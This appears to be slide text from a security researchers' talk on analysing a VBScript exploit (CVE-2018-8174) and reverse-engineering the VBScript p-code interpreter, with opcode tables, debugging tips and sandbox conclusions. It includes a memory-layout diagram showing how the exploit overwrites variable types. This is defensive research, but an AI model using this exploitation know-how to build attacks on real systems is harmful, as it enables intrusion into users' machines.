  • 41. CVE-2018-8174 – Exploit +0 +0x34 +0x74 +0 +0x48 +0x80 VVAL ‘P’ VVAL ‘P0123456789’ size: 0x32 + len(‘P’) = 0x34 size: 0x32 + len(‘P0123456789’) = 0x48 VVAL ‘SetProp’ size: 0x32 + len(‘SetProp’) = 0x40 VVAL ‘mem’ size: 0x32 + len(‘mem’) = 0x38 VVAL ‘SPP’ size: 0x32 + len(‘SPP’) = 0x38 VVAL ‘mem’ size: 0x32 + len(‘mem’) = 0x38 Class1 variables Class2 variables +0x74 +0x80 05 00 00 00 00 00 00 00 00 00 00 00 0C 20 00 00 08 00 00 00 00 00 00 00 A D D R 00 00 00 00Class1.mem Type Overwritten Class2.mem Type Class2.mem Data Class1.mem Data
  • 42. VBScript interpreter Interpreter is closed source Implemented in vbscript.dll module VBScript is compiled into p-code that then is interpreted P-code is undocumented VBScript interpreter
  • 43. 43 • IE developer tools • Supports VBScript debugging • Visual studio • Possible to debug VBScript with wscript • wscript //D //X test.vbs • Not intended to debug exploits • Missing all crucial information to analyse vulnerabilities VBScript debugging
  • 44. VBScript debugging: how-to Instrument script with calls to some uncommon function (e.g. CStr() ) Set breakpoint at this function in native debugger
  • 45. VBScript’s p-code interpreter interpreter 112 cases (111 p-code instructions) int __thiscall CScriptRuntime::RunNoEH(CScriptRuntime *this, struct VAR *)
  • 46. VBScript’s p-code != Visual Basic’s p-code http://web.archive.org/web/20101127044116/http://vb-decompiler.com/pcode/opcodes.php?t=1 1159 instructions in Visual Basic VS 111 instructions in VBScript Format of instructions is different Visual Basic’s opcodes
  • 47. VBScript instructions Googling “VBScript” shows that there is no prior research on a subject However, it was possible to find two posts by Microsoft employees 2004 - https://blogs.msdn.microsoft.com/ericlippert/2004/04/19/runtime-typing-in-vbscript/ 1999 - https://groups.google.com/forum/#!topic/microsoft.public.inetserver.asp.general/xlCz5paTWxM
  • 48. VBScript instructions Googling “VBScript” shows that there is no prior research on a subject However, it was possible to find 2 post of Microsoft employees 2004 - https://blogs.msdn.microsoft.com/ericlippert/2004/04/19/runtime-typing-in-vbscript/ 1999 - https://groups.google.com/forum/#!topic/microsoft.public.inetserver.asp.general/xlCz5paTWxM 2004
  • 49. VBScript instructions Googling “VBScript” shows that there is no prior research on a subject However, it was possible to find 2 post of Microsoft employees 2004 - https://blogs.msdn.microsoft.com/ericlippert/2004/04/19/runtime-typing-in-vbscript/ 1999 - https://groups.google.com/forum/#!topic/microsoft.public.inetserver.asp.general/xlCz5paTWxM 2004 1999
  • 50. Decoding VBScript instructions Now we know 18 out of 111 instructions! 1999 OP_FnBind 0x55 OP_LocalAdr 0x19 OP_Bos1 0x03 OP_FixType 0x54 OP_NamedAdr 0x1D OP_EQ 0x42 OP_IntConst 0x0B OP_BitOr 0x3E OP_CallNmdAdr 0x28 OP_JccFalse 0x3C OP_CallMemVoid 0x31 OP_LocalSt 0x1A OP_Bos0 0x02 OP_Jmp 0x3A OP_FuncEnd 0x01 OP_Sub 0x49 OP_FnReturn 0x57 OP_Add 0x48
  • 51. Family Visual Basic Visual Basic for Applications (VBA) Visual Basic Scripting Edition (VBScript) eMbedded Visual Basic (eVB)
  • 52. eMbedded Visual Basic (eVB) Windows CE Windows Mobile Based on VBScript IMG: https://www.amazon.com/ViewSonic-V35-Pocket-PC-Handheld/dp/B00006RSK5
  • 53. eMbedded Visual Basic (eVB) Download and unpack eMbedded Visual Basic (eVB) Runtime .cab Biggest file is 00pvbvbs.022 Lets load it in IDA Pro
  • 54. eMbedded Visual Basic (eVB) It’s a debug build!
  • 56. VBScript opcodes 101 instruction in eVB against 111 in VBScript
  • 57. Mapping of eVB instructions to VBScript instructions eVB VBScript New instructions
  • 59. • Microsoft Office is a hot target for attackers and will remain so • Attackers aim for the easiest targets and legacy features will be abused • A sandbox is effective in the detection of zero-days (proven with a long list of CVE’s) Highlights about our sandbox: • https://securelist.com/a-modern-hypervisor-as-a-basis-for-a-sandbox/81902/ • https://www.kaspersky.com/enterprise-security/wiki-section/products/sandbox • There is the possibility of more VBScript vulnerabilities exploited through Microsoft Office • VBScript controls are blocked by default in Office 365 • We shared our tools with the community to make the debugging of VBScript exploits easier Conclusions
  • 61. LET’S TALK? Boris Larin @oct0xor Vlad Stolyarov @vladhiewsha